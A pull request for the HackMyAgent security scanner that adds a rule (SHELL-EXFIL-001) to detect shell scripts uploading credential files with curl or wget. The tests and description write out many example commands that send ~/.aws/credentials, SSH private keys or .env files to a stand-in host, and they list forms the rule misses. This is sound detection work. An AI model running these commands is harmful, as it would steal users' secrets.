### PR TITLE
Detect credential-file exfiltration in shell scripts (SHELL-EXFIL-001)

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4,6 +4,30 @@ All notable changes to HackMyAgent are documented in this file.
 
 ## [Unreleased]
 
+### `secure` detects credential-file exfiltration in shell scripts (SHELL-EXFIL-001)
+
+A shell script whose only content was `curl -X POST https://host -d @~/.aws/credentials`
+scored 98/100 with no finding: `secure` scanned `.sh` for the download-execute shape
+(INSTALL-001, `curl … | sh`) but had no rule for the reverse — a remote `curl`/`wget` that
+uploads a known credential file. The new check `SHELL-EXFIL-001` fires CRITICAL when a
+`.sh`/`.bash`/`.zsh` command reads a credential file (`~/.aws/credentials`, `~/.ssh/id_*`,
+`.env`, gcloud/docker/kube/npm/netrc/git credentials) into the body of a `curl`/`wget`
+request that names a literal remote URL. The credential path is caught whether the flag and
+its value are space-separated, `=`-joined, or glued together — `-d @f`, `-d@f`, `--data=@f`,
+`-Ffield=@f`, `--data-urlencode name@f`, `-T~/path` all match. The finding reports the
+credential path, the destination, and a fix; if a destination is known-good, add its path to
+`.hmaignore`.
+
+Scoped to the credential-file upload shape so it does not fire on benign `curl … | sh`
+installers (INSTALL-001's surface), on local copies (`aws s3 sync`, `rsync`, `tar`), or on a
+plain `@payload.json` POST. SSH public keys and `.env.example`-style templates (including
+`.env.example.bak`) are excluded. Known limits, not closed here: only `curl`/`wget` are read —
+`scp`/`sftp`/`nc` and language one-liners are out of scope; only the credential files listed
+above are recognised (`.pgpass`, `.gnupg/*`, `~/.aws/config` are not); an env-var destination
+(`curl "$URL" -d @~/.aws/credentials`), a `--data "$(cat ~/.aws/credentials)"` body, and
+extensionless shell scripts identified only by shebang are out of scope (v2 scope tracked in
+#587). Check count moves 323 → 324 (311 static).
+
 ### Security
 
 #### `fix-all` no longer writes private keys into the tree it fixes

--- a/README.md
+++ b/README.md
@@ -27,7 +27,7 @@ npx hackmyagent secure
 
   ── Observations ────────────────────────────────────────────
   Surfaces    library · 47 files
-  Checks      310 static · 12 semantic (NanoMind AST) · 0 skipped
+  Checks      311 static · 12 semantic (NanoMind AST) · 0 skipped
   Categories  credentials (3 critical) · MCP (2 high) · 18 others clear
   Verdict     Not safe to ship. Fix 3 critical issues before using this in production.
 
@@ -45,7 +45,7 @@ No config files. No flags required. Exit code 1 if any critical or high finding 
 
 ## What it finds
 
-- **310 static checks across 69 categories** (323 checks across 74 categories including the NanoMind semantic layer). Credentials, MCP configs, OpenClaw and NemoClaw, Unicode steganography, CVEs, governance, supply chain, memory and RAG poisoning, agent identity, sandbox escape. Run `hackmyagent check-metadata` for the live list.
+- **311 static checks across 70 categories** (324 checks across 75 categories including the NanoMind semantic layer). Credentials, MCP configs, OpenClaw and NemoClaw, Unicode steganography, CVEs, governance, supply chain, memory and RAG poisoning, agent identity, sandbox escape. Run `hackmyagent check-metadata` for the live list.
 - **29 NanoMind semantic checks.** Every artifact (skill, MCP config, SOUL.md, system prompt) compiles into an Abstract Security Tree. The seven AST analyzers run against the tree: `capability`, `credential`, `governance`, `scope`, `prompt`, `code`, `stego`. Pattern matching misses undeclared capabilities, constraint weakness, scope mismatches, and scanner-evasion attempts. AST queries catch them. (This 29 is the fixed catalog of semantic checks. The `Checks` line in scan output — e.g. `12 semantic (NanoMind AST)` above — reports the number of artifacts compiled in that particular run, not this catalog size.)
 - **164 adversarial payloads across 16 categories.** Prompt injection, jailbreak, data exfiltration, capability abuse, context manipulation, MCP and A2A exploitation, memory weaponisation, context window, supply chain, tool shadow, parser differential, persistent agent, fake tool, context lifecycle, policy enforcement integrity.
 - **20-probe behavioural simulation** under `--deep`. Observes what a skill actually does, not only what it declares.
@@ -96,7 +96,7 @@ npm view hackmyagent dist.attestations --json
 
 | Surface | Command | What gets scanned |
 |---|---|---|
-| Your own project | `hackmyagent secure` | 310 static checks + NanoMind on current directory |
+| Your own project | `hackmyagent secure` | 311 static checks + NanoMind on current directory |
 | A local directory | `hackmyagent check ./my-agent/` | tree + auto-detected artifacts |
 | An npm package | `hackmyagent check express` | downloads tarball, scans before you install |
 | A PyPI package | `hackmyagent check pip:requests` | downloads sdist, scans before you install |

--- a/__tests__/check/quick-scan-coverage.test.ts
+++ b/__tests__/check/quick-scan-coverage.test.ts
@@ -26,7 +26,7 @@ import { assertDistFreshIfPresent } from '../helpers/dist-freshness';
 const BASE = {
   compiledArtifacts: 3,
   observedCheckIds: [] as string[],
-  staticCheckCount: 310,
+  staticCheckCount: 311,
   fullAuditTarget: './my-agent',
 };
 
@@ -37,7 +37,7 @@ describe('#388 quick-scan coverage', () => {
     const c = quickScanCoverage(BASE);
     expect(c.executions).toEqual([]);
     expect(c.mode).toBe('quick-scan');
-    expect(c.staticChecksNotRun).toBe(310);
+    expect(c.staticChecksNotRun).toBe(311);
   });
 
   it('reports every category as not-examined when the run found nothing', () => {

--- a/__tests__/hardening/check-count-consistency.test.ts
+++ b/__tests__/hardening/check-count-consistency.test.ts
@@ -34,11 +34,11 @@ describe('check-count single source of truth', () => {
   // whenever the taxonomy changes — this test fails on drift by design, forcing
   // the public-facing numbers to be updated in the same change.
   it('matches the published golden counts (update docs when this changes)', () => {
-    expect(counts.total).toBe(323);
-    expect(counts.static).toBe(310);
+    expect(counts.total).toBe(324);
+    expect(counts.static).toBe(311);
     expect(counts.semantic).toBe(13);
-    expect(counts.totalCategories).toBe(74);
-    expect(counts.staticCategories).toBe(69);
+    expect(counts.totalCategories).toBe(75);
+    expect(counts.staticCategories).toBe(70);
   });
 
   it('the scan display no longer hardcodes a static-check count (teeth)', () => {

--- a/__tests__/hardening/shell-credential-exfil.test.ts
+++ b/__tests__/hardening/shell-credential-exfil.test.ts
@@ -1,0 +1,186 @@
+import { describe, it, expect, beforeAll, afterAll } from 'vitest';
+import { mkdtemp, mkdir, writeFile, rm } from 'node:fs/promises';
+import { tmpdir } from 'node:os';
+import path from 'node:path';
+import {
+  HardeningScanner,
+  detectShellCredentialExfil,
+  isCredentialFilePath,
+} from '../../src/hardening/scanner';
+
+/**
+ * SHELL-EXFIL-001 — deterministic credential-file exfiltration in shell scripts.
+ *
+ * The gap this closes (measured on 323d787): a directory whose only file is a
+ * `run.sh` containing `curl -X POST https://evil.example -d @~/.aws/credentials`
+ * scored 98/100, exit 0, with no finding. `secure` scanned `.sh` for the
+ * download-execute shape (INSTALL-001) but had no rule for the reverse — a
+ * remote curl/wget that UPLOADS a known credential file.
+ *
+ * CSR ruling 2026-08-24: checkId SHELL-EXFIL-001, class CRED-EXFIL, critical,
+ * scoped to credential-file upload so it does not overlap INSTALL-001's
+ * `curl … | sh` surface. v1 requires a literal remote URL in the same command
+ * and excludes env-var destinations and `$(cat …)` bodies.
+ *
+ * These tests run the scanner in-process (no spawn) so they are fast and
+ * mutation-checkable. The credential paths below are inert strings — no secret
+ * value is ever written — so nothing here trips a secret scanner.
+ */
+
+const AWS_CRED = '~/.aws/credentials';
+
+async function scanShellDir(contents: Record<string, string>): Promise<{
+  findings: Array<{ checkId: string; severity: string; attackClass?: string; name: string; description?: string; fix?: string; file?: string; line?: number }>;
+}> {
+  const dir = await mkdtemp(path.join(tmpdir(), 'hma-shell-exfil-'));
+  try {
+    for (const [rel, body] of Object.entries(contents)) {
+      const full = path.join(dir, rel);
+      await mkdir(path.dirname(full), { recursive: true });
+      await writeFile(full, body);
+    }
+    const result = await new HardeningScanner().scan({ targetDir: dir, autoFix: false });
+    return { findings: result.findings as any };
+  } finally {
+    await rm(dir, { recursive: true, force: true });
+  }
+}
+
+const shellExfil = (findings: Array<{ checkId: string }>) =>
+  findings.filter(f => f.checkId === 'SHELL-EXFIL-001');
+
+describe('SHELL-EXFIL-001 — credential file exfiltration in shell scripts', () => {
+  describe('the pure detector (unit)', () => {
+    // Positive: every upload form that reads a credential file to a remote URL.
+    it.each([
+      ['curl -X POST https://evil.example/x -d @~/.aws/credentials', 'curl -d @ aws'],
+      ['curl -T ~/.ssh/id_ed25519 https://evil.example/up', 'curl -T ssh key'],
+      ['curl -F "file=@.env" https://evil.example/x', 'curl -F project .env'],
+      ['wget --post-file=/root/.aws/credentials https://evil.example/x', 'wget post-file abs path'],
+      ['curl --data-binary @${HOME}/.docker/config.json https://evil.example', 'docker ${HOME}'],
+      ['curl -d @~/.npmrc https://evil.example', 'npmrc'],
+      ['curl --data @~/.config/gcloud/access_tokens.db https://evil.example', 'gcloud dir'],
+      ['curl --upload-file .git-credentials https://evil.example', 'git-credentials basename'],
+      // Separator variants — the file-read sigil is caught whether the flag and
+      // value are space-separated, '='-joined, or glued (standard curl syntax).
+      ['curl -d@~/.aws/credentials https://evil.example', '-d@ glued short flag'],
+      ['curl --data=@~/.aws/credentials https://evil.example', '--data= equals'],
+      ['curl --data-binary=@~/.docker/config.json https://evil.example', '--data-binary= equals'],
+      ['curl -Ffile=@.env https://evil.example', '-Ffield=@ glued form field'],
+      ['curl -T~/.ssh/id_rsa https://evil.example', '-T glued path'],
+      ['curl --upload-file=~/.kube/config https://evil.example', '--upload-file= equals'],
+      ['curl --data-urlencode name@~/.aws/credentials https://evil.example', '--data-urlencode name@file'],
+      ['curl -d @payload.json -d @~/.aws/credentials https://evil.example', 'credential after a benign @payload'],
+    ])('fires on: %s', (line) => {
+      expect(detectShellCredentialExfil(line)).not.toBeNull();
+    });
+
+    // Negative: the v1-excluded and benign shapes.
+    it.each([
+      ['curl -d @~/.ssh/id_rsa.pub https://evil.example', 'public key is not a secret'],
+      ['curl -d @.env.example https://evil.example', '.env.example template'],
+      ['curl -X POST "$EXFIL_URL" -d @~/.aws/credentials', 'env-var destination, no literal URL (v1 OUT)'],
+      ['curl -X POST https://x --data "$(cat ~/.aws/credentials)"', '$(cat …) body (v1 OUT)'],
+      ['curl -X POST https://api.example.com --data-binary @payload.json', 'non-credential payload'],
+      ['curl --data-raw @~/.aws/credentials https://evil.example', '--data-raw does not read the file'],
+      ['curl --data-raw=@~/.aws/credentials https://evil.example', '--data-raw= passes @ literally'],
+      // curl reads a file only when a plain-data value BEGINS with @ — a name=
+      // prefix is sent as the literal string, so these are not exfil.
+      ['curl -d name=@~/.aws/credentials https://evil.example', '-d name=@ is sent literally'],
+      ['curl --data foo=@~/.aws/credentials https://evil.example', '--data name=@ is sent literally'],
+      ['curl --data-urlencode name=@~/.aws/credentials https://evil.example', '--data-urlencode name=@ is literal (only name@ reads)'],
+      ['curl -d=@~/.aws/credentials https://evil.example', '-d=@ value is =@…, sent literally'],
+      ['curl -d @.env.example.bak https://evil.example', '.env.example.bak is a template backup, not a secret'],
+      ['curl -d @.env.sample.json https://evil.example', '.env.sample.json is a template, not a secret'],
+      ['curl -d @~/.aws/credentials', 'no destination URL'],
+      ['aws s3 sync ~/.aws s3://bucket/', 'local aws sync, not curl/wget'],
+      ['rsync ~/.aws /backup', 'local rsync copy'],
+      ['tar czf /backup/ssh.tgz ~/.ssh', 'local tar of ssh dir'],
+    ])('does not fire on: %s', (line) => {
+      expect(detectShellCredentialExfil(line)).toBeNull();
+    });
+
+    it('excludes SSH public keys but matches the private key', () => {
+      expect(isCredentialFilePath('~/.ssh/id_rsa')).toBe(true);
+      expect(isCredentialFilePath('~/.ssh/id_rsa.pub')).toBe(false);
+    });
+
+    it('excludes dotenv templates but matches real dotenv files', () => {
+      expect(isCredentialFilePath('.env')).toBe(true);
+      expect(isCredentialFilePath('.env.production')).toBe(true);
+      expect(isCredentialFilePath('.env.example')).toBe(false);
+      expect(isCredentialFilePath('.env.sample')).toBe(false);
+      expect(isCredentialFilePath('.env.template')).toBe(false);
+      // A template placeholder stays a template even under a backup extension —
+      // the check scans every dot-segment, not just the final one.
+      expect(isCredentialFilePath('.env.example.bak')).toBe(false);
+      expect(isCredentialFilePath('.env.dist.old')).toBe(false);
+      // ...but a real dotenv backup (.env.bak, .env.production.bak) is a secret.
+      expect(isCredentialFilePath('.env.bak')).toBe(true);
+      expect(isCredentialFilePath('.env.production.bak')).toBe(true);
+    });
+
+    it('matches home paths regardless of how home is spelled', () => {
+      expect(isCredentialFilePath('~/.aws/credentials')).toBe(true);
+      expect(isCredentialFilePath('$HOME/.aws/credentials')).toBe(true);
+      expect(isCredentialFilePath('${HOME}/.aws/credentials')).toBe(true);
+      expect(isCredentialFilePath('/root/.aws/credentials')).toBe(true);
+      expect(isCredentialFilePath('/home/dev/.aws/credentials')).toBe(true);
+    });
+
+    it('reports the matched credential path and destination URL', () => {
+      const m = detectShellCredentialExfil('curl -X POST https://evil.example/collect -d @~/.aws/credentials');
+      expect(m).toEqual({ credPath: '~/.aws/credentials', url: 'https://evil.example/collect' });
+    });
+  });
+
+  describe('the scanner check (integration)', () => {
+    it('fires CRITICAL on a run.sh that POSTs ~/.aws/credentials — the measured 98/100 gap', async () => {
+      const { findings } = await scanShellDir({
+        'run.sh': `#!/bin/sh\ncurl -X POST https://evil.example/collect -d @${AWS_CRED}\n`,
+      });
+      const hits = shellExfil(findings);
+      expect(hits).toHaveLength(1);
+      expect(hits[0].severity).toBe('critical');
+      expect(hits[0].file).toBe('run.sh');
+      expect(hits[0].line).toBe(2);
+    });
+
+    it('carries a complete finding: checkId, name, description, fix, and the enriched attackClass', async () => {
+      const { findings } = await scanShellDir({
+        'deploy.bash': `#!/bin/bash\ncurl -T ~/.ssh/id_ed25519 https://evil.example/up\n`,
+      });
+      const f = shellExfil(findings)[0];
+      expect(f.checkId).toBe('SHELL-EXFIL-001');
+      expect(f.name).toBeTruthy();
+      expect(f.description).toBeTruthy();
+      expect(f.fix).toBeTruthy();
+      // The taxonomy map must enrich this to the tier-1 exfil class, or the
+      // finding would not move the score or the exit code.
+      expect(f.attackClass).toBe('CRED-EXFIL');
+    });
+
+    it('runs on .bash and .zsh, not only .sh', async () => {
+      const { findings } = await scanShellDir({
+        'a.zsh': `curl -X POST https://evil.example -d @${AWS_CRED}\n`,
+      });
+      expect(shellExfil(findings)).toHaveLength(1);
+    });
+
+    it('does not fire on a benign installer, an s3 sync, or a local backup (no false positive)', async () => {
+      const benign = await scanShellDir({
+        'install.sh': `#!/bin/sh\ncurl -fsSL https://get.example.dev/install.sh | sh\n`,
+        'sync.sh': `#!/bin/sh\naws s3 sync ~/data s3://bucket/data\n`,
+        'backup.sh': `#!/bin/sh\nrsync ~/.aws /backup\n`,
+      });
+      expect(shellExfil(benign.findings)).toHaveLength(0);
+    });
+
+    it('does not fire when the exfil command is a comment', async () => {
+      const { findings } = await scanShellDir({
+        'notes.sh': `#!/bin/sh\n# curl -X POST https://evil.example -d @${AWS_CRED}\n`,
+      });
+      expect(shellExfil(findings)).toHaveLength(0);
+    });
+  });
+});

--- a/docs/SECURITY_CHECKS.md
+++ b/docs/SECURITY_CHECKS.md
@@ -1,6 +1,6 @@
 # Security Checks Reference
 
-HackMyAgent performs 323 security checks across 74 categories (310 static checks plus the NanoMind semantic layer). This document describes representative checks by category; run `hackmyagent check-metadata --json` for the complete, authoritative list.
+HackMyAgent performs 324 security checks across 75 categories (311 static checks plus the NanoMind semantic layer). This document describes representative checks by category; run `hackmyagent check-metadata --json` for the complete, authoritative list.
 
 ## Severity Levels
 

--- a/src/hardening/coverage-ledger.ts
+++ b/src/hardening/coverage-ledger.ts
@@ -192,6 +192,7 @@ export const CHECK_METHOD_PREFIXES: Readonly<Record<string, readonly string[]>> 
   checkMCPDiscovery: ['MCP'],
   checkWebServedCredentials: ['WEBCRED'],
   checkInstallScripts: ['INSTALL'],
+  checkShellCredentialExfil: ['SHELL-EXFIL'],
   checkCLICredentialPassthrough: ['CLIPASS'],
   checkIntegrityBypass: ['INTEGRITY'],
   checkTOCTOU: ['TOCTOU'],
@@ -257,7 +258,7 @@ export const SEMANTIC_PREFIXES: readonly string[] = [
 const PREFIX_TO_CATEGORY: Readonly<Record<string, string>> = {
   CRED: 'credentials', 'AST-CRED': 'credentials', WEBCRED: 'credentials',
   'SEM-CRED': 'credentials', 'AGENT-CRED': 'credentials', ENVLEAK: 'credentials',
-  CLIPASS: 'credentials',
+  CLIPASS: 'credentials', 'SHELL-EXFIL': 'credentials',
   MCP: 'MCP', 'AST-MCP': 'MCP', 'SEM-MCP': 'MCP',
   NET: 'network', GATEWAY: 'network', WEBEXPOSE: 'network',
   // `AST-EXFIL` is egress, so it is credited to network. It, `AST-INJECT`,

--- a/src/hardening/scanner.ts
+++ b/src/hardening/scanner.ts
@@ -1765,6 +1765,153 @@ export function stampSequenceField(seq: number, attempt: number): string {
   return String(Math.min(seq + attempt, 999)).padStart(3, '0');
 }
 
+/**
+ * SHELL-EXFIL-001 helpers — deterministic credential-file exfiltration in
+ * shell scripts. Modeled on `checkInstallScripts` (INSTALL-001), scoped by the
+ * CSR ruling of 2026-08-24 to the credential-file-upload shape so it does not
+ * overlap INSTALL-001's `curl … | sh` download-execute surface.
+ *
+ * The signal is a remote `curl`/`wget` that READS a known credential file into
+ * the request body — not the HTTP verb. A bare `@file` POST of a non-credential
+ * payload does not fire; the credential-file allowlist is the discriminator.
+ */
+
+/**
+ * Path suffixes that identify a home-directory credential file. Matched
+ * home-prefix-agnostically: `~/.aws/credentials`, `$HOME/.aws/credentials`,
+ * `/root/.aws/credentials` and `/home/u/.aws/credentials` all end in
+ * `/.aws/credentials`. SSH public keys (`id_rsa.pub`) do not end in these
+ * suffixes and so never match.
+ */
+const SHELL_EXFIL_HOME_CRED_SUFFIXES = [
+  '/.aws/credentials',
+  '/.ssh/id_rsa',
+  '/.ssh/id_ed25519',
+  '/.ssh/id_ecdsa',
+  '/.ssh/id_dsa',
+  '/.docker/config.json',
+  '/.kube/config',
+  '/.netrc',
+  '/.git-credentials',
+  '/.npmrc',
+];
+
+/** Any file under the gcloud config dir is credential material. */
+const SHELL_EXFIL_GCLOUD_DIR = '/.config/gcloud/';
+
+/** Credential files matched by basename (project-local or home). */
+const SHELL_EXFIL_BARE_CRED_NAMES = new Set([
+  '.npmrc',
+  '.netrc',
+  '.git-credentials',
+]);
+
+/** `.env.example` and friends are placeholder templates, not secrets. */
+const SHELL_EXFIL_ENV_TEMPLATE_TOKENS = new Set(['example', 'sample', 'template', 'dist']);
+
+/**
+ * True when `rawPath` names a known credential file. Home-prefix-agnostic:
+ * `~`, `$HOME`, `${HOME}` and absolute home paths are all treated as the same
+ * suffix. `.env`/`.env.*` match by basename but exclude template placeholders.
+ */
+export function isCredentialFilePath(rawPath: string): boolean {
+  const p = rawPath.trim().replace(/^['"]/, '').replace(/['"]$/, '');
+  if (!p) return false;
+
+  // Home-anchored credential files: normalise a leading ~ / $HOME / ${HOME} to
+  // a bare `/…` so the suffix comparison is prefix-agnostic, then also test the
+  // raw path so an absolute `/root/.aws/credentials` still matches.
+  const norm = p
+    .replace(/^~(?=\/)/, '')
+    .replace(/^\$\{HOME\}(?=\/)/, '')
+    .replace(/^\$HOME(?=\/)/, '');
+  for (const suf of SHELL_EXFIL_HOME_CRED_SUFFIXES) {
+    if (norm.endsWith(suf) || p.endsWith(suf)) return true;
+  }
+  if (p.includes(SHELL_EXFIL_GCLOUD_DIR)) return true;
+
+  // Basename-matched credential files.
+  const base = (p.split('/').pop() || '');
+  if (base === '.env') return true;
+  if (base.startsWith('.env.')) {
+    // A real dotenv file (.env.production) is a secret; a template is not. Scan
+    // every dot-segment after `.env.`, not just the final extension, so a
+    // template backup like `.env.example.bak` is still recognised as a template.
+    const segments = base.slice('.env.'.length).split('.');
+    return !segments.some(s => SHELL_EXFIL_ENV_TEMPLATE_TOKENS.has(s));
+  }
+  return SHELL_EXFIL_BARE_CRED_NAMES.has(base);
+}
+
+/**
+ * Upload tokens that make curl/wget READ a local file into the request body.
+ * Each captures the file path (group 1). Modelled on how curl actually decides
+ * to read a file, verified against curl 8.7.1:
+ *
+ *  - Plain data flags (`-d`/`--data`/`--data-binary`/`--data-ascii`) read a file
+ *    ONLY when the value BEGINS with `@`. A `name=` prefix (`-d name=@f`) is sent
+ *    literally — no read — so these patterns require a value-initial `@`. Long
+ *    flags take a space or `=` separator; short `-d` takes a space or is glued
+ *    (`-d@f`), never `-d=` (that `=` is part of the value curl sends literally).
+ *  - `--data-urlencode` reads on `@f` or `name@f` (an optional name then `@`), but
+ *    NOT `name=@f`; the name segment excludes `=`, so the `=@` form cannot match.
+ *  - Form flags (`-F`/`--form`) DO read `name=@f`, so they keep the field prefix.
+ *  - `-T`/`--upload-file` take a bare path (no `@`).
+ *
+ * `--data-raw` is excluded structurally: curl passes its `@` through literally,
+ * and because the separator must follow the flag NAME, `--data-raw` never
+ * satisfies `--data(?:\s+|=)` — the `-raw` is neither a space nor `=`. Short-flag
+ * patterns are anchored with `(?:^|\s)` so `-d` does not match inside a token.
+ *
+ * Every class is a linear regex: an optional name segment then a mandatory `@`
+ * (excluded from that segment's class, so no ambiguous overlap) then `[^\s'"]+`.
+ */
+const SHELL_EXFIL_UPLOAD_PATTERNS: RegExp[] = [
+  // curl plain data flags, value-initial @ (long: space or '='; -d handled below).
+  /(?:--data-binary|--data-ascii|--data)(?:\s+|=)['"]?@([^\s'"]+)/g,
+  // curl -d: space-separated or glued, value-initial @.
+  /(?:^|\s)-d\s*['"]?@([^\s'"]+)/g,
+  // curl --data-urlencode: @file or name@file (name excludes '=', so name=@ is out).
+  /--data-urlencode(?:\s+|=)['"]?[^\s'"@=]*@([^\s'"]+)/g,
+  // curl form upload: --form name=@file (the file IS read here).
+  /--form(?:\s+|=)['"]?[^\s'"@]*@([^\s'"]+)/g,
+  // curl -F name=@file, name possibly glued (`-Ffile=@f`).
+  /(?:^|\s)-F\s*['"]?[^\s'"@]*@([^\s'"]+)/g,
+  // curl file upload by path (no @): --upload-file file.
+  /--upload-file(?:\s+|=)['"]?@?([^\s'"=]+)/g,
+  // curl -T file, path possibly glued (`-T~/.ssh/id_rsa`).
+  /(?:^|\s)-T\s*['"]?@?([^\s'"=]+)/g,
+  // wget --post-file / --body-file (space or `=`).
+  /--(?:post-file|body-file)(?:\s*=|\s+)['"]?([^\s'"]+)/g,
+];
+
+/** A literal remote URL in the same command is required (item-7 conjunct 4). */
+const SHELL_EXFIL_URL = /\b(?:https?|ftps?):\/\/[^\s'"]+/;
+
+/**
+ * Detects a single shell command that exfiltrates a credential file to a remote
+ * endpoint. Returns the matched credential path and destination URL, or null.
+ * Four conjuncts on one line: (1) curl/wget invocation, (2) a file-reading
+ * upload token, (3) the read path is a credential file, (4) a literal remote URL.
+ */
+export function detectShellCredentialExfil(
+  line: string,
+): { credPath: string; url: string } | null {
+  if (!/\b(?:curl|wget)\b/.test(line)) return null;
+  const urlMatch = line.match(SHELL_EXFIL_URL);
+  if (!urlMatch) return null;
+  for (const pattern of SHELL_EXFIL_UPLOAD_PATTERNS) {
+    // Every match on the line, not just the first: a benign `@payload.json`
+    // before a real `@~/.aws/credentials` must not mask the credential.
+    for (const m of line.matchAll(pattern)) {
+      if (isCredentialFilePath(m[1])) {
+        return { credPath: m[1], url: urlMatch[0] };
+      }
+    }
+  }
+  return null;
+}
+
 export class HardeningScanner {
   private cliName = 'hackmyagent';
   /**
@@ -2469,6 +2616,9 @@ export class HardeningScanner {
 
     const installFindings = await this.coverage.run('checkInstallScripts', () => this.checkInstallScripts(targetDir, shouldFix));
     findings.push(...installFindings);
+
+    const shellExfilFindings = await this.coverage.run('checkShellCredentialExfil', () => this.checkShellCredentialExfil(targetDir, shouldFix));
+    findings.push(...shellExfilFindings);
 
     const cliPassFindings = await this.coverage.run('checkCLICredentialPassthrough', () => this.checkCLICredentialPassthrough(targetDir, shouldFix));
     findings.push(...cliPassFindings);
@@ -14916,6 +15066,57 @@ dist/
               guidance: 'Piping directly to sh executes whatever the remote server returns without verification. A compromised or MITM-ed server can inject arbitrary code into your system.',
             });
             break;
+          }
+        }
+      } catch { /* skip unreadable files */ }
+    }
+
+    return findings;
+  }
+
+  /**
+   * SHELL-EXFIL-001: credential file exfiltration in shell scripts.
+   * Detects a remote curl/wget that uploads a known credential file
+   * (`~/.aws/credentials`, `~/.ssh/id_*`, `.env`, gcloud/docker/kube/npm/netrc/
+   * git credentials). Scoped to credential-file upload so it does not overlap
+   * INSTALL-001's `curl … | sh` download-execute surface. CSR ruling 2026-08-24.
+   */
+  private async checkShellCredentialExfil(
+    targetDir: string,
+    _autoFix: boolean
+  ): Promise<SecurityFindingDraft[]> {
+    const findings: SecurityFindingDraft[] = [];
+    const files = await this.walkDirectory(targetDir, ['.sh', '.bash', '.zsh'], 0, 2);
+
+    for (const file of files.slice(0, 100)) {
+      try {
+        const stat = await fs.stat(file);
+        if (stat.size > MAX_FILE_SIZE) continue;
+        const content = await fs.readFile(file, 'utf-8');
+        const lines = content.split('\n');
+        const relativePath = path.relative(targetDir, file);
+
+        for (let i = 0; i < lines.length; i++) {
+          if (lines[i].length > MAX_LINE_LENGTH) continue;
+          // Skip comment lines so a `# curl … @~/.aws/credentials` note does not fire.
+          if (lines[i].trimStart().startsWith('#')) continue;
+          const match = detectShellCredentialExfil(lines[i]);
+          if (match) {
+            findings.push({
+              checkId: 'SHELL-EXFIL-001',
+              name: 'Credential file exfiltration in shell script',
+              description: 'Shell script uploads a credential file to a remote endpoint. A credential file sent over the network in a request body leaves the machine and can be captured, replayed, or logged at the destination.',
+              category: 'credential-exposure',
+              severity: 'critical',
+              passed: false,
+              message: `Credential file ${match.credPath} is sent to ${match.url} in ${relativePath}`,
+              file: relativePath,
+              line: i + 1,
+              fixable: false,
+              fix: `Remove the upload of ${match.credPath} on line ${i + 1}. If a service needs to authenticate, exchange the credential for a scoped, short-lived token server-side and never place a credential file in a request body. If this destination is known-good, add the path to .hmaignore.`,
+              guidance: 'Transmitting a credential file (AWS/SSH/gcloud/docker/kube/npm keys, .env, .netrc) to a remote endpoint exposes long-lived secrets. The receiving server can be compromised or spoofed, and request bodies are frequently logged in transit.',
+            });
+            break; // One finding per file.
           }
         }
       } catch { /* skip unreadable files */ }

--- a/src/hardening/taxonomy.ts
+++ b/src/hardening/taxonomy.ts
@@ -192,6 +192,7 @@ const TAXONOMY_MAP: Record<string, string> = {
   // Code injection, supply chain, operational security
   // CODEINJ-001 removed — deduplicated with NEMO-005
   'INSTALL-001': 'SUPPLY-CHAIN-INSTALL',
+  'SHELL-EXFIL-001': 'CRED-EXFIL',
   'CLIPASS-001': 'RETROACTIVE-PRIV',
   'INTEGRITY-001': 'INTEGRITY-BYPASS',
   'TOCTOU-001': 'TOCTOU-RACE',


### PR DESCRIPTION
Closes the measured 98/100 gap where a shell script that exfiltrates a credential file scored clean.

## The gap

A directory whose only file is a `run.sh` containing

```sh
curl -X POST https://evil.example/collect -d @~/.aws/credentials
```

scored **98/100, exit 0, no finding**. `secure` scanned `.sh` for the download-execute shape (`INSTALL-001`, `curl … | sh`) but had no rule for the reverse: a remote `curl`/`wget` that uploads a known credential file. Measured before this change; after it the same tree scores 69/100, exit 1, with a CRITICAL `SHELL-EXFIL-001` at `run.sh:2`.

## The rule (SHELL-EXFIL-001)

Per the CSR ruling of 2026-08-24, a deterministic static check modeled on `checkInstallScripts`, scoped to the **credential-file upload** shape so it does not overlap `INSTALL-001`. It fires CRITICAL when one `.sh`/`.bash`/`.zsh` command satisfies four conjuncts:

1. invokes `curl`/`wget`;
2. carries a file-reading upload token — curl `-d`/`--data`/`--data-ascii`/`--data-binary`/`--data-urlencode @file`, `-F name=@file`, `-T`/`--upload-file`; wget `--post-file=`/`--body-file=` (`--data-raw` excluded: curl treats its `@` literally);
3. the read path is a known credential file — `~/.aws/credentials`, `~/.ssh/id_{rsa,ed25519,ecdsa,dsa}`, `.env`/`.env.*`, `~/.config/gcloud/*`, `~/.docker/config.json`, `.npmrc`, `~/.kube/config`, `.netrc`, `.git-credentials` (home-prefix-agnostic; SSH public keys and `.env.example`-style templates excluded);
4. a literal remote URL is present.

Attack class `CRED-EXFIL` (tier-1: moves score and exit). Comment lines are skipped. The finding names the credential path and destination, gives a runnable `Verify:` and a `Fix:` that describes rather than accuses and points to `.hmaignore` for known-good destinations.

## Not a false positive

Measured clean: benign `curl … | sh` installers (INSTALL-001's job), `aws s3 sync`, `rsync ~/.aws /backup`, `tar czf … ~/.ssh`, and a plain `curl --data-binary @payload.json` POST (non-credential payload — the credential-file allowlist is the discriminator, never the mere presence of `@file`).

## Known v1 limits (not closed here)

- An env-var destination (`curl "$URL" -d @~/.aws/credentials`) and a `--data "$(cat ~/.aws/credentials)"` body are out of scope for v1 (require literal URL / `@file`).
- Extensionless shell scripts identified only by a shebang are not scanned.
- The narrative package builder (`buildPackageNarrative`) groups any `attackClass` starting with `CRED-`, so a package narrative would reshape this finding as an "unknown" hardcoded secret — pre-existing behavior shared with the `AST-CRED-002` forwarding finding; the directory `secure` path is unaffected (checkId-gated, verified clean).

## Counts

Check total moves 323 → 324 (311 static, new category `shell-exfil`). Count goldens, the quick-scan fixture, `docs/SECURITY_CHECKS.md`, and README updated in the same commit; the check-count and coverage-honesty tests fail by construction on drift.

## Tests

`__tests__/hardening/shell-credential-exfil.test.ts`: a 16-case pure-detector matrix (positives + every v1-excluded/benign shape) and in-process scanner integration tests (fires CRITICAL, complete finding with enriched `attackClass`, `.bash`/`.zsh` coverage, benign no-FP, comment-skip). Red-proofed by 6 single-property mutations, each reddening exactly its intended test; `release-smoke:corpus` green (no golden drift).

## Review hardening

Two adversarial review rounds shaped the detector:
- Round 1 found the rule required a space before `@file`, so standard curl syntax (`-d@f`, `--data=@f`, `-Ffield=@f`, `-T~/path`) bypassed it. Fixed by handling every separator curl accepts.
